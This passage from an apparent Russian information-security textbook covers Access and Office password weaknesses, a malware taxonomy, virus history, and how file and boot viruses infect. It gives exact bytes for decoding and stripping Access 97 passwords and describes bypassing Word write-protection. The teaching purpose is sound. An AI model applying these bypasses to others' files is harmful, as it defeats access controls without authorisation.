166 Так для Access 97 необходимо было выполнить XOR 13 байт, распо- ложенных по смещению 0x42 от начала файла базы данных, со следую- щей последовательностью: 0x86, 0xFB, 0хЕС, 0x37, 0x5D, 0x44, 0х9С, 0xFA, 0хСВ, 0х5Е, 0x28, 0хЕВ, 0x13. Альтернативный способ снятия пароля заключался в исправлении заголовка и установке значения байта, соответствующего первому сим- волу, в такое состояние, чтобы после расшифровки заголовка там оказы- вался нулевой байт. Тогда Access, интерпретирующий пароль как стро- ку, заканчивающуюся нулевым символом, увидев ноль в первом байте, решит, что пароль вообще не установлен. Для снятия пароля в Access 97 необходимо установить байт по смещению 0x42 от начала файла в зна- чение 0x86. Кстати, разработчики одной коммерческой программы, поз- воляющей восстановить забытые пароли к базам Microsoft Access, в опи- сании новшеств очередной версии указали, что время, затрачиваемое на отыскание пароля, уменьшилось в 1,5 раза. Вероятно, для этого им при- шлось уменьшить задержку перед выводом найденного пароля на экран, т. к. значительно сложнее придумать очень медленный способ выполне- ния XOR, а потом ускорить его в 1,5 раза. Начиная с Access 2000, простое наложение гаммы уже не позволяет сразу же определить пароль, т. к. необходимо выполнить еще несколько дополнительных несложных действий. Но пароль все равно хранится в заголовке, а значит, может быть оттуда прочитан. Что самое занимательное, установка пароля на открытие базы данных не приводит к шифрованию ее содержимого. Однако Access поддерживает та- кую операцию, как шифрование базы данных, но пароль в этом шифровании никак не участвует, а ключ шифрования хранится в заголовке файла базы. Другой тип паролей, поддерживаемых Microsoft Access, использу- ется не для обеспечения секретности, а для разграничения доступа. Но при проектировании, похоже, было допущено несколько ошибок, свя- занных и с этими паролями. Правильно было бы хранить не пароли, а их хэши. Но, по непонят- ным причинам, в системной базе данных, содержащей имена, пароли и прочие атрибуты всех пользователей, можно найти сами пароли, зашиф- рованные трехкратным DES с двумя ключами в режиме EDE (Encrypt- Decrypt-Encrypt), когда первый ключ применяется дважды, на первом и третьем шаге. Ключи, как обычно, являются константами и хранятся в динамически загружаемой библиотеке. Такая защита позволяет быстро
167 определить пароль любого пользователя, хотя Microsoft утверждает, что утерянные пароли пользователей Access не могут быть восстановлены. В системной базе данных для каждого пользователя хранится и уникальный идентификатор, являющийся функцией от имени пользова- теля и некоторой произвольной строки, вводимой при создании учетной записи. И именно этот идентификатор является ключом, по которому идентифицируются пользователи в основной базе данных. Так, например, у каждой таблицы в основной базе данных есть вла- делец, который имеет максимальные права. Но в основной базе данных хранится только идентификатор пользователя, являющегося владельцем, а имя и вся вспомогательная информация для аутентификации пользова- теля хранится в системной базе данных. И создается впечатление, что если системная база данных будет утеряна, то доступ к содержимому основной базы данных получить не удастся. Но функция вычисления идентификатора пользователя сравнитель- но легко обращаема, что позволяет определить имя владельца иденти- фикатора и строку, введенную при создании его учетной записи. После этого остается только создать новую системную базу данных и добавить в нее пользователя с известными атрибутами, но вообще без пароля. Advanced Office 97 Password Recovery 1.22R Парольная защита применяется не только программами- архиваторами; такую возможность имеют также документы Microsoft Office. Advanced Office 97 Password Recovery позволяет восстановить потерянный пароль к документам Word 97, Excel 97 или к любой 32- битной версии MS Access. Пароли к Word и Excel находятся методами прямого перебора, перебора по маске и по словарю. Перебор можно прервать и продолжить в любое время. Пароли для MS Access, пароли защиты записи и книг/листов MS Excel находятся прямым декодирова- нием. Возможно сохранение всех опций программы в файле проекта. В версии 1.22 поддерживаются все документы Office 2000.
168 Рис. 29. Нахождение пароля документа Word Использование пароля защиты документа от записи как способ за- щиты является самым слабым. Пароль защиты записи хранится в доку- менте в чистом виде. Можно даже поискать его любым hex-редактором. Хранится он в unicode и не требует расхэширования. Снять эту "защиту" можно изменением одного бита в документе. Advanced VBA Password Recovery 1.22R Advanced VBA Password Recovery — программа для восстановле- ния потерянных паролей к VBA-макросам, встроенным в документы Microsoft Office 97 (см. рис. 30). Она позволяет находить пароли к мак- росам Word 97 и Excel 97. Пароли находятся мгновенно, прямым деко- дированием. В дальнейшем планируется добавление возможности уда- лять или изменять пароль непосредственно из программы, а также осу- ществление работы с документами, созданными более современной вер- сией пакета MS Office 2000.
Рис. 30. Взлом пароля макросов
169 Несмотря на многочисленные напоминания и предупреждения, пользователи, особенно неопытные, часто применяют в качестве пароля обычные слова. Конечно, это облегчает его запоминание и использова- ние, но следует помнить, что в той же степени снижается стойкость па- роля, поскольку такой пароль можно подобрать простым перебором по словарю. Этот способ занимает гораздо меньше времени по сравнению с полным перебором всех возможных вариантов. В любом случае реко- мендуется сначала попробовать перебор по словарю, а затем уже пере- ходить к прямому перебору либо перебору по маске.
170 4. МЕТОДЫ И СРЕДСТВА ЗАЩИТЫ ИНФОРМАЦИИ ОТ ПРОГРАММНО-МАТЕМАТИЧЕСКИХ УГРОЗ 4.1. Современные программно-математические угрозы информационной безопасности в АС
Под программно-математическими угрозами понимаются потенци-
ально возможные воздействия вредоносными программами, созданными специально для уничтожения, блокирования, модификации или копиро- вания информации, несанкционированного пользователем, или наруше- ния работы компьютеров или компьютерных сетей. Viruses and Worms Вредоносные программы, которые могут без ведома пользователя саморазмножаться на компьютерах или их в сетях, при этом каждая по- следующая копия также обладает способностью к саморазмножению Net-Worm. Размножаются в компьютерных сетях. Отличительной особенностью данного типа червей является то, что им не нужен пользо- ватель в качестве звена в цепочке распространения Email-Worm – вредоносная программа, обладающая способностью к несанкционированному пользователем саморазмножению по каналам электронной почты. При этом червь отсылает либо свою копию в виде вложения в электронное письмо, либо ссылку на свой файл, располо- женный на каком-либо сетевом ресурсе IM-Worm – вредоносная программа, обладающая способностью к несанкционированному пользователем саморазмножению по каналам систем мгновенного обмена сообщениями (например, ICQ, MSN Messenger, AOL Instant Messenger, Yahoo Pager, Skype и др.). IRC-Worm - вредоносная программа, обладающая способностью к несанкционированному пользователем саморазмножению через Internet Relay Chats P2P-Worm - вредоносная программа, обладающая способностью к несанкционированному пользователем саморазмножению по каналам файлообменных пиринговых сетей (например, Kazaa, Grokster, EDonkey, FastTrack, Gnutella и др.) Worm - вредоносная программа, обладающая способностью к не- санкционированному пользователем саморазмножению в компьютерных
171 сетях через сетевые ресурсы. В отличие от Net-Worm для активации Worm пользователю необходимо запустить его. Virus - вредоносная программа, обладающая способностью к не- санкционированному пользователем саморазмножению по локальным ресурсам компьютера Trojan programs Вредоносные программы, созданные для осуществления несанкци- онированных пользователем действий, направленных на уничтожение, блокирование, модификацию или копирование информации, нарушение работы компьютеров или компьютерных сетей. В отличие от вирусов и червей, представители данной категории не обладают способностью к саморазмножению. Backdoor - вредоносная программа, предназначенная для несанкци- онированного пользователем удаленного управления злоумышленником пораженным компьютером. По своей функциональности они во многом напоминают различные системы администрирования, разрабатываемые и распространяемые фирмами- производителями программных продук- тов. Trojan - вредоносная программа, предназначенная для осуществле- ния несанкционированных пользователем действий, влекущих уничто- жение, блокирование, модификацию или копирование информации, нарушение работы компьютеров или компьютерных сетей, и при всем при этом не попадающая ни под одно из нижеприведенных троянских поведений. Trojan-Ransom - вредоносная программа, предназначенная для не- санкционированной пользователем модификации данных на компьюте- ре-жертве таким образом, чтобы сделать невозможным работу с ними, либо блокировать нормальную работу компьютера. После того, как дан- ные «взяты в заложники» (блокированы) пользователю выдвигается тре- бование выкупа. Trojan-ArcBomb - представляют собой архивы, специально оформ- ленные таким образом, чтобы вызывать нештатное поведение архивато- ров при попытке разархивировать данные — зависание или существен- ное замедление работы компьютера или заполнение диска большим ко- личеством «пустых» данных. Trojan-Clicker - вредоносная программа, предназначенная для не- санкционированного пользователем обращения к интернет-ресурсам (обычно к веб-страницам). Достигается это либо посылкой соответству- ющих команд браузеру, либо заменой системных файлов, в которых ука-
172 заны «стандартные» адреса интернет-ресурсов (например, файл hosts в MS Windows). Trojan-DDoS - вредоносная программа, предназначенная для прове- дения несанкционированной пользователем DoS- (Denial of Service) ата- ки с пораженного компьютера на компьютер-жертву по заранее опреде- ленному адресу. Trojan-Downloader - вредоносная программа, предназначенная для несанкционированной пользователем загрузки и установки на компью- тер-жертву новых версий вредоносных программ, установки «троянцев» или рекламных систем. Загруженные из интернета программы затем ли- бо запускаются на выполнение, либо регистрируются «троянцем» на ав- тозагрузку в соответствии с возможностями операционной системы. Trojan-Dropper - вредоносная программа, предназначенная для не- санкционированной пользователем скрытой инсталляции на компьютер- жертву вредоносных программ, содержащихся в теле этого типа «троян- цев». Trojan-IM - вредоносная программа, предназначенная для кражи пользовательских аккаунтов (логин и пароль) от интернет-пейджеров (например, ICQ, MSN Messenger, AOL Instant Messenger, Yahoo Pager, Skype и др.). Найденная информация передается злоумышленнику. Trojan-Notifier - вредоносная программа, предназначенная для не- санкционированного пользователем сообщения своему «хозяину» о том, что зараженный компьютер сейчас находится «на связи». При этом на адрес злоумышленника отправляется информация о компьютере, напри- мер, IP-адрес компьютера, номер открытого порта, адрес электронной почты и т. п. Trojan-Proxy - вредоносная программа, предназначенная для осу- ществления злоумышленником несанкционированного пользователем анонимного доступа к различным интернет-ресурсам через компьютер- жертву. Trojan-SMS - вредоносная программа, предназначенная для несанк- ционированной пользователем отсылки SMS-сообщений с пораженных мобильных устройств на дорогостоящие платные номера, которые жест- ко записаны в теле вредоносной программы. Trojan-Spy - вредоносная программа, предназначенная для ведения электронного шпионажа за пользователем (вводимая с клавиатуры ин- формация, снимки экрана, список активных приложений и т.д.). Найденная информация передается злоумышленнику.
173 Trojan-Mailfinder - вредоносная программа, предназначенная для несанкционированного пользователем сбора адресов электронной почты на компьютере с последующей передачей их злоумышленнику через электронную почту, web, ftp или другими способами. Trojan-GameThief - вредоносная программа, предназначенная для кражи пользовательской информации, относящейся к сетевым играм. Найденная информация передается злоумышленнику. Trojan-PSW - вредоносная программа, предназначенная для кражи пользовательских аккаунтов (логин и пароль) с пораженных компьюте- ров. Trojan-Banker - вредоносная программа, предназначенная для кражи пользовательской информации, относящейся к банковским системам, системам электронных денег и пластиковых карт. Найденная информа- ция передается злоумышленнику. Rootkit - программа, предназначенная для сокрытия в системе опре- деленных объектов, либо активности. Сокрытию, как правило, подвер- гаются ключи реестра (например, отвечающие за автозапуск вредонос- ных объектов), файлы, процессы в памяти зараженного компьютера, вредоносная сетевая активность. Malicious tools Вредоносные программы, разработанные для автоматизации созда- ния других вирусов, червей или троянских программ, организации DoS- атак на удаленные сервера, взлома других компьютеров и т. п. В отличие от вирусов червей и троянских программ, представители данной катего- рии не представляют угрозы непосредственно компьютеру, на котором исполняются (за исключением поведения Packed). Constructor - программы, предназначенные для изготовления новых компьютерных вирусов, червей и троянских программ. DoS - программа, предназначенная для проведения DoS- (Denial of Service) атаки с ведома пользователя на компьютер-жертву Exploit - программы, в которых содержатся данные или исполняе- мый код, позволяющие использовать одну или несколько уязвимостей в программном обеспечении на локальном или удаленном компьютере с заведомо вредоносной целью. Email-Flooder - программы, функцией которых является «забивания мусором» (бесполезными сообщениями) каналов электронной почты IM-Flooder - программы, функцией которых является «забивания мусором» (бесполезными сообщениями) каналов интернет-пейджеров
174 (например, ICQ, MSN Messenger, AOL Instant Messenger, Yahoo Pager, Skype и др.). SMS-Flooder - программы, функцией которых является «забивания мусором» (бесполезными сообщениями) каналов передачи SMS- сообщений Flooder - программы, функцией которых является «забивания мусо- ром» (бесполезными сообщениями) сетевых каналов, отличных от поч- товых, интернет-пейджеров и SMS (например, IRC) Spoofer - программы, позволяющие отправлять сообщения и сете- вые запросы с поддельным адресом отправителя VirTool - программы, позволяющие злоумышленнику модифициро- вать другие вредоносные программы таким образом, чтобы они не де- тектировались антивирусным программным обеспечением NetGrabber - программы, позволяющие пользователю получать не- санкционированный доступ к информации передающейся по сетевым каналам Hoax - программы, которые не причиняют компьютеру какого-либо прямого вреда, однако выводят сообщения о том, что такой вред уже причинен, либо будет причинен при каких-либо условиях, либо преду- преждают пользователя о несуществующей опасности. К «злым шут- кам» относятся, например, программы, которые «пугают» пользователя сообщениями о форматировании диска (хотя никакого форматирования на самом деле не происходит), детектируют вирусы в незараженных файлах, выводят странные вирусоподобные сообщения и т. д. — в зави- симости от «чувства юмора» автора такой программы. Packed - программы, которые были упакованы с помощью специа- лизированных программ сжатия, созданных злоумышленниками с целью сокрытия их вредоносного функционала HackTool - программа, используемая злоумышленниками при орга- низации атак на локальный или удаленный компьютер (например, не- санкционированное пользователем внесение нелегального пользователя в список разрешенных посетителей системы; очистка системных журна- лов с целью сокрытия следов присутствия в системе и т.д.). PUPS Потенциально-нежелательные программы (PUPs, Potentially Unwanted Programs) - это программы, которые разрабатываются и рас- пространяются легальными компаниями, могут использоваться в повсе- дневной работе, например, системных администраторов. Проблема за- ключается в том, что некоторые программы обладают набором функций,
175 которые могут причинить вред пользователю только при выполнении ряда условий. Adware – рекламное программное обеспечение (Adware, Browser Hijackers) предназначено для показа рекламных сообщений (чаще всего, в виде графических баннеров), перенаправления поисковых запросов на рекламные web-страницы, а также для сбора данных маркетингового ха- рактера о пользователе (например, какие тематические сайты посещает пользователь), что позволяет сделать рекламу гораздо более таргетиро- ванной. Pornware - программы, которые так или иначе связаны с показом пользователю информации порнографического характера. Riskware - к этой категории относятся легальные программы (неко- торые из них свободно продаются и широко используются в легальных целях), которые, тем не менее, в руках злоумышленника способны при- чинить вред пользователю.
4.1.2. Компьютерные вирусы
История компьютерных вирусов (КВ) ведет свой отсчет с середины
70-х годов - с появления игровых программ на ЭВМ. , Идейной основой их создания следует считать концепцию самовоспроизводящихся авто- матов, конструктивно разработанную Дж. фон Нейманом (США). Она базируется на теореме, смысл которой состоит в том, что конечный ав- томат, достигший определенного уровня сложности, может реплициро- вать (воспроизводить) себя и естественно саморазрушаться. Говоря ина- че, способность к саморазмножению и самодеструкции является неотъ- емлемым свойством всякой достаточно сложной программы или вычис- лительного устройства. В 1951 г. Дж. фон Нейман предложил метод по- строения автоматов данного класса. Несколько позднее (1959 г.) F.G. Stahl (США) довел до программ- ного уровня (на языке ЭВМ IBM 650) модель поведения неких организ- мов, которые могли двигаться, питаться и размножаться. При размноже- нии была предусмотрена возможность мутации, в результате которой новый организм оказывался способным к пожиранию себе подобных и/или не мог размножаться. В 1961г. группа американских программи- стов (в их числе был Роберт Моррис) предложила довольно необычную для того времени игру "Дарвин", в которой несколько программ разных видов, названных организмами, должны были убивать представителей другого вида, размножаться и занимать жизненное пространство. Игра быстро распространилась, особенно в студенческой среде. Описание
176 этой игры было опубликовано лишь в 1972 г. Примечательным в нем было то, что для идентификации одного из видов организмов использо- вался термин "вирус". Эта безобидная игровая программа несла в себе элементы вирусной технологии. Явно видимая аналогия между компью- терными и биологическими вирусами повлекла за собой широкое ис- пользование при рассмотрении вирусных программ и соответственно средств борьбы с ними биолого-медицинской терминологии. В 1974 г. была написана программа Rabbit (Кролик), которая раз- множалась на трех связанных между собой ЭВМ. При размножении программы происходило замедление реакции, а затем и полное зависа- ние ЭВМ. Это была первая вирусоподобная программа. За ней последо- вал ряд других. Популяризации программ-вирусов во многом способ- ствовали научно-фантастические романы данной направленности [16]. В 1980 г. появилась первая публикация по компьютерным вирусам - "Самовоспроизводящиеся программы" И. Крауса (ФРГ). В ней был впервые определен термин "компьютерный вирус" и были приведены листинги некоторых известных компьютерных вирусов. Данное И. Кра- усом определение компьютерного вируса не претерпело серьезных из- менений до сих пор. Под компьютерным вирусом понимается программа, которая мо- жет включать в другие программы свою, иногда модифицированную ко- пию, способную к дальнейшему размножению и выполнению вредных воздействий [2]. В ГОСТ Р 51188-98 "Защита информации" дано следу- ющее определение КВ. Компьютерный вирус - программа, способная создавать свои копии (необязательно совпадающие с оригиналом) и внедрять их в файлы, системные области компьютера, компьютерных сетей, а также осуществлять иные деструктивные действия. При этом копии сохраняют способность дальнейшего распространения. Зараженную вирусом программу можно рассматривать как автома- тически созданный вид троянской программы. Скрытым модулем в ней является тело вируса, а одним из несанкционированных действий - за- ражение других программ. Другими несанкционированными действиями могут быть: стирание файлов, разрушение каталогов и т.п. Жизненный цикл компьютерных вирусов, как и других искусствен- ных объектов включает три стадии: создание вируса; функционирование вируса; прекращение его существования.
177 Стадия создания вирусной программы во многом совпадает со ста- дией создания программ общего и специального назначения. Отличия имеют место главным образом при внедрении. Для стадии функционирования вируса характерны следующие эта- пы (фазы): Латентная фаза (фаза выжидания), Инкубационная фаза (фаза размножения), Проявление вируса (выполнение деструктивных действий). Некоторые вирусы могут не иметь латентной фазы и фазы проявле- ния - они только размножаются. Примером таких вирусов являются так называемые "черви" (репликаторы). После обнаружения вирус уничтожается, и принимаются меры по предотвращению его распространения. Однако не исключены случаи повторного заражения данным вирусом, например, сохранившимся в ка- ком-нибудь архивном файле. Исходя из этого, время существования ви- русов связывается со временем использования одной или ряда версий операционной системы компьютера. Дело в том, что в вирусах исполь- зуются особенности построения конкретной версии операционной си- стемы и, естественно, привязанные к ней вирусы с переходом на другую версию теряют полностью или частично свою работоспособность. Виру- сы повышенной сложности (изощренности) более жестко привязывают- ся к операционной системе и существуют, как правило, в рамках жизни одной ее версии. Что касается простых вирусов, то их жизненный цикл может захватывать время использования нескольких версий операцион- ной системы. Таким образом, основными предпосылками появления и развития компьютерных вирусов следует считать: работы по самовоспроизводящимся автоматам; создание игровых программ с приданием им функций оказания воз- действия на другие программ; массовое использование ПЭВМ; широкое распространение вычислительных сетей. Анализ построения вирусных программ показывает, что они созда- ются как новичками в программировании, только-только пробующими свои силы, так и профессиональными, нередко даже талантливыми про- граммистами (безусловно, качество "творений" тех и других существен- но отличается). Сам собой возникает вопрос, что побуждает заниматься вирусной деятельностью. К побудительным мотивам создания вирусов относят:
178 стремление к самоутверждению (хотя бы и таким образом); желание отомстить обидчику; недопонимание последствий воздействия компьютерных вирусов в различных областях применения ЭВМ; определенная уверенность в безнаказанности за вирусный ванда- лизм; сознательное стимулирование рыночного спроса на антивирусное обеспечение; проявление программистского хулиганства. Первой мерой противодействия компьютерным вирусам считают составление списка опасных загружаемых программ, известного под названием "Черная дюжина" (1985 г.). В это же время появилась первая антивирусная программа, позволявшая выявить путем контекстного анализа вызывающие подозрение участки загружаемой программы. Первые случаи массового заражения КВ были зафиксированы в 1987 году. Начало массовым заражениям (эпидемиям) положил Паки- станский вирус. Данный тип вируса создавался братьями Амджатом и Базитом Алви для наказания американцев, которые в Пакистане скупали по низкой цене получаемые незаконным тиражированием копии про- грамм. После распродажи инфицированных продуктов копирования только в США оказались зараженными более 18 тысяч персональных компьютеров. Вслед за Пакистанским вирусом возбудителями эпидемий выступали Лехайский вирус (США), Иерусалимский вирус (Израиль) и другие. Обычные компьютерные вирусы и их разновидности (логические бомбы, черви, троянские кони) стали объектом повышенного внимания со стороны зарубежных военных специалистов. Они отводят вирусам роль одного из средств ведения информационной войны. Считается, что с помощью вирусов можно осуществлять эффективные диверсии в энер- гетических, транспортных, банковских и других жизненно важных си- стемах и изолировать противника от остального мира.
4.1.3. Механизмы действия компьютерных вирусов
Вирус приводится в действие (активизируется) только в результате
запуска на выполнение программы, которую он инфицировал. Действие вирусов состоит в множественном заражении и проявлении. Заражение является обычно начальным и обязательным действием вируса. Используются два вида стратегий заражения:
179 1) стратегии, основанные на поиске заражаемых файлов путем про- смотра каталогов: заражение всех файлов, удовлетворяющих критерию выбора, зада- ваемому файловыми атрибутами; заражение всех файлов из текущего каталога; заражение одного файла в каталоге, в котором находится запуска- емый на выполнение файл; заражение файлов главного каталога; заражение файлов, путь доступа к которым указан в команде PATH; заражение по одному случайно выбираемому файлу в каждом ка- талоге. 2) стратегии, основанные на перехвате выполняемой с файлом опе- рации: заражение создаваемых файлов; заражение открываемых файлов; заражение запускаемых на выполнение файлов; заражение считываемых файлов; заражение переименуемых файлов; заражение файлов, которым присваиваются атрибуты или атрибу- ты которых читаются; заражение закрываемых файлов. При заражении вирус может выполнять ряд операций, маскирую- щих и ускоряющих его распространение. Жизненный цикл вредоносной программы: 1. Проникновение Применение методов социальной инженерии 2. Инсталляция 3. Борьба с антивирусами Установка своих файлов, служб, драйверов Обеспечение автозапуска Сокрытие в системе (маскировка) Инъекция в другие процессы 4. Вредоносная активность Вредоносная нагрузка Обновление В упрощенном виде механизм заражения программных файлов вы- глядит следующим образом. Программа-вирусоноситель обычно изме- няется так, чтобы по окончании загрузки ее в оперативную память
180 управление передавалось вирусу. Используя информацию о расположе- нии выполняемых программ, инициализированный вирус приступает к поиску очередной программы-жертвы. Если программный файл, удовле- творяющий требованиям выбора, найден, происходит его заражение. Копия вируса вставляется в заражаемую программу (в начало, середину или конец). Производится корректировка ее кода, обеспечивающая пе- редачу управления вирусу до начала выполнения самой программы. Да- лее вирус восстанавливает свою программу-носитель и передает ей управление. Для различных типов вирусов процесс заражения имеет некоторые особенности. Рассмотрим его применительно к файловым и бутовым ви- русам. Файловые вирусы способны заражать любой тип исполняемых файлов. Наиболее просто заражаются СОМ-файлы, которые содержат готовые к выполнению машинные программы, инвариантные к адресу загрузки. Такая программа не может занимать более одного сегмента (64 Кбайт) и допускает загрузку в оперативную память практически без настройки содержащихся в ней адресов (настройка ограничивается запи- сью в сегментные регистры адреса загрузки). Нерезидентные файловые вирусы инициализируются после загруз- ки в память зараженных программных файлов. Получив управление, ви- рус проверяет, та ли используемая в компьютере версия операционной системы, под которую он разработан. При операционной среде, несоответствующей ориентации вируса, производится переход на выполнение набора завершающих действий. Вирус восстанавливает программу-вирусоноситель, переписывая сохра- ненные в своем теле байты ее начала на прежнее место, приводит в ис- ходное состояние регистры микропроцессора и передает управление программе-вирусоносителю. Если операционная среда для вируса подходит, осуществляется просмотр текущего каталога и поиск в нем очередного СОМ-файла. Тип файла определяется по его расширению или по содержанию его началь- ных байтов. Найденный СОМ-файл считывается и подвергается провер- ке на зараженность данным вирусом. Способы проверки зараженности файла достаточно разнообразны (нахождение отметок о заражении, по- иск сигнатуры вируса в файле путем его сканирования и др.). В том слу- чае, когда файл оказался зараженным, выполняется поиск следующего файла типа СОМ. Файл, оказавшийся незараженным, проходит еще одну проверку - на заражаемость (поддается ли он заражению данным виру-
181 сом). Если заражение СОМ-файла невозможно, ищется новая жертва, если возможно - реализуется непосредственно сама процедура зараже- ния. Прежде всего, вирус снимает с заражаемого файла атрибут READ ONLY и фиксирует в своем теле дату его создания. Затем им осуществ- ляется перепись начальных байтов заражаемого файла в свое тело. Вме- сто них записывается сформированная вирусом команда безусловной передачи управления вирусу. Копия вируса помещается в конец заража- емого файла. Заражение завершается присвоением зараженному файлу значений атрибутов, которые он имел до заражения. Вирусы могут настраиваться на единичное и множественное зара- жение. Поэтому после окончания процедуры заражения предусматрива- ется проверка условий настройки вируса. Если число реализованных за- ражений меньше требуемого, процесс выполнения вирусной программы продолжается. В противном случае он завершается восстановлением начала программы-вирусоносителя, приведением в исходное состояние регистров микропроцессора и передачей управления программе- вирусоносителю. Тело вируса при заражении может имплантироваться не только в конец, но и в начало и в середину заражаемого файла. Для имплантации в начало заражаемого файла необходимо его начальную часть, соответствующую по размерам телу вируса, перепи- сать в конец. Перед передачей управления программе-вирусоносителю она восстанавливается, а вирусный код перемещается на другое место. Очевидно, при размещении в начало заражаемого файла вирус будет по- лучать управление непосредственно. Некоторые примитивные вирусы реализуют запись своей копии в начало заражаемого файла без сохранения его содержимого (без увели- чения его длины). Чтобы скрыть факт нарушения файла, применяются определенные меры маскировки (например, его выполнение имитирует- ся выдачей сообщения об ошибке). Имплантация тела вируса в середину заражаемого файла предпола- гает перепись соответствующей части его кода в конец и обеспечение передачи управления вирусу. Если файл содержит рабочие области до- статочного размера, вирус размещает свою копию без увеличения длины файла. Резидентные файловые вирусы инициализируются при выполнении зараженных программных файлов, а точнее при обращении их к опреде- ленным функциям операционной системы (обычно функциям обслужи-
182 вания файлов), причем с передачей управления инсталлятору. После инициализации инсталлятор проверяет версию операционной системы и зараженность оперативной памяти. При соответствии результатов этих проверок условиям заражения копия вируса переписывается в оператив- ную память, и выполняются действия, необходимые для закрепления ее участка за вирусом. Затем инсталлятор обеспечивает реализацию пере- хвата прерываний путем замены адресов в соответствующих элементах вектора прерываний на адреса своих модулей обработки, восстановле- ние измененных байтов файла-вирусоносителя и передачу ему управле- ния. Данная часть выполняемых инсталлятором операций составляет первую фазу функционирования вируса - фазу его инсталляции. За фазой инсталляции следует фаза слежения. На ней каждый раз при возникновении прерывания и его перехвата управление получает соответствующий модуль обработки. Он анализирует контекст обраще- ния программы к операционной системе, определяет имя ее файла, за- ражает этот файл при выполнении с ним той или иной операции (запуска на выполнение, открытия, чтения и т.п.) и передает управление заражен- ному файлу. Бутовые вирусы заражают загрузочный (первый) сектор дискет или жесткого диска. Механизм заражения для всех бутовых вирусов одина- ков. Расположенный на дискете вирус сначала внедряется в оператив- ную память компьютера. Это происходит при загрузке операционной системы. Программа начальной загрузки считывает содержимое загру- зочного сектора инфицированной дискеты в оперативную память и пе- редает управление вирусу. С получением управления бутовый вирус ко- пирует себя, считывает с дискеты свое продолжение (если оно имеется) и устанавливает значения векторов прерываний (12h и 13h), обеспечи- вающие защиту вирусного тела и перехват обращений к дискете (диску). После выполнения этих действий управление от вируса передается на системный загрузчик, который осуществляет стандартную загрузку опе- рационной системы. Дальнейшие действия бутового вируса примерно такие же, что и резидентного файлового вируса - перехват обращений к дискам, обработка прерываний и инфицирование загрузочных секторов дисков. При любом обращении к диску управление получает вирусный об- работчик этого прерывания. Он определяет, к какому типу диска отно- сится обращение: дискете или винчестеру. Затем проверяется, заражен уже диск или нет. Если диск еще не заражен, производится его зараже- ние. Бутовый вирус переносит содержимое загрузочного сектора диска в
183 какой-либо другой сектор и копирует на этот участок памяти свое тело. Когда длина вирусной копии больше длины загрузочного сектора, то в нем помещается ее начальная часть. Части продолжения вируса разме- щаются в других секторах. Для размещения загрузочного сектора-оригинала и продолжения вируса могут задействоваться: сектора свободных кластеров логического диска; неиспользуемые или редко используемые системные сектора; сектора за пределами логического диска. Поиск секторов свободных кластеров на диске ведется с помощью таблицы размещения файлов FAT. Задействованные свободные класте- ры вирус помечает в таблице FAT как сбойные. Неиспользуемыми или редко используемыми системными сектора- ми принято считать: на дискете - последние сектора корневого каталога, на винчестере - сектора между MBR и первым Boot-сектором. Сектора за пределами диска - это сектора, создаваемые вирусом пу- тем форматирования на диске дополнительного трека. Данный способ размещения загрузочного сектора-оригинала и продолжения вируса встречается сравнительно редко. Далее вирус переписывает системную информацию загрузчика- оригинала (из Boot-cектора дискет - BIOS Parameter Block, из MBR - Disk Partition Table) в свой код и, наконец, передает управление загруз- чику-оригиналу. Следует отметить, что бутовыми вирусами могут заражаться не только системные дискеты (содержащие ОС), но и несистемные (содер- жащие любую другую информацию). Фаза проявления, состоящая в вы- полнении несанкционированных действий, может чередоваться с раз- множением или начинаться через некоторое время (инкубационный пе- риод). Типовыми видами проявлений вирусов-вандалов являются: прекращение выполнения отдельных функций программы (напри- мер, блокирование загрузки программы с защищенной от записи диске- ты, блокирование запуска антивирусных программ); выполнение непредусмотренных действий (к примеру, изменение данных в файле); разрушение отдельных файлов, управляющих блоков или всей фай- ловой системы (путем удаления файлов, форматирования диска и т.п.); имитация ошибок и сбоев в системных и пользовательских про- граммах (переполнение, перезагрузка, зависание); блокирование доступа к системным ресурсам;
184 ускоренный износ оборудования (НГМД); создание визуальных и звуковых эффектов (падение букв на экране, проигрывание мелодий, выдача различных изображений, ложных и от- влекающих сообщений). Несанкционированные действия, выполняемые вирусами, могут обусловливаться наступлением определенных событий (установка за- данной даты, заражение заданного числа программ и т.п.). Наиболее уязвима от вирусов файловая система MS DOS, Windows 9X - FAT, а в ней таблица размещения файлов. Если происходит разру- шение таблицы FAT, ОС не может определить местонахождение файлов, хотя сами файлы целы. На компьютерах типа РС АТ данные о конфигу- рации (тип винчестера, число НГМД и др.) хранятся в небольшой энер- гонезависимой памяти (CMOS). Уничтожение ее содержимого приводит к невозможности загрузки с жесткого диска.
4.2. Программные закладки
Рассмотрение воздействия закладки и программ защиты информа- ции можно сравнить с взаимодействием вируса и прикладной програм- мы. Вирус может присоединиться к исполняемому файлу, соответству- ющим образом изменив его, может уничтожить некоторые файлы или встроиться в цепочку драйверов. Закладка отличается более направлен- ным и тонким воздействием. Однако ясно, что и вирус, и закладка долж- ны скрывать свое присутствие в операционной среде компьютерной си- стемы. Особенностью закладок может быть и то, что они фактически становятся неотделимы от прикладных или системных программ, если внедрены в них на стадии разработки или путем обратного проектирова- ния (путем дисассемблирования прикладной программы, внедрения кода закладки и последующей компиляции). Если компьютерная система содержит механизмы защиты от НСД, то несанкционированные действия могут быть вызваны следующими основными причинами: отключение или видоизменение защитных механизмов нелегаль- ным пользователем; вход в систему под именем и с полномочиями реального пользова- теля. В первом случае злоумышленник должен видоизменить защитные механизмы в системе (например, отключить программу запросов паро- лей пользователей), во втором - каким-либо образом выяснить или под-
185 делать идентификатор реального пользователя (например, подсмотреть пароль, вводимый с клавиатуры). В обоих случаях НСД можно представить моделью опосредованно- го доступа - когда проникновение в систему осуществляется на основе некоторого воздействия, произведенного предварительно внедренной в систему программой или несколькими программами. Например, злоумышленник создал программное средство и внедрил его каким-либо способом в систему проверки прав доступа и предостав- ления этих прав. Тогда при осуществлении доступа легального пользо- вателя внедренная в систему программа запомнит его пароль и сохранит в заранее известном доступном злоумышленнику файле, а затем неле- гальный пользователь воспользуется данным паролем для входа в си- стему. В другом случае злоумышленник может изменить часть системы защиты так, чтобы она перестала выполнять свои функции (например, изменит программу шифрования вручную или при помощи некоторой другой программы так, чтобы она перестала шифровать или изменила алгоритм шифрования на более простой). Описанные ситуации, в которых применяется понятие закладки, не- сколько отличается от ранее использованной в литературе. Ранее поня- тие закладки в основном связывалось с разработкой программного обес- печения, а конкретно, с написанием исходных текстов программ, в кото- рых создаются дополнительные функции (в иностранной литературе ло- гическая бомба, логический люк, троянский конь). Следовательно, ранее закладка понималась как внутренний объект защищенной системы. Однако, вообще говоря, закладка может быть и внешним по отно- шению к защищенной системе объектом.
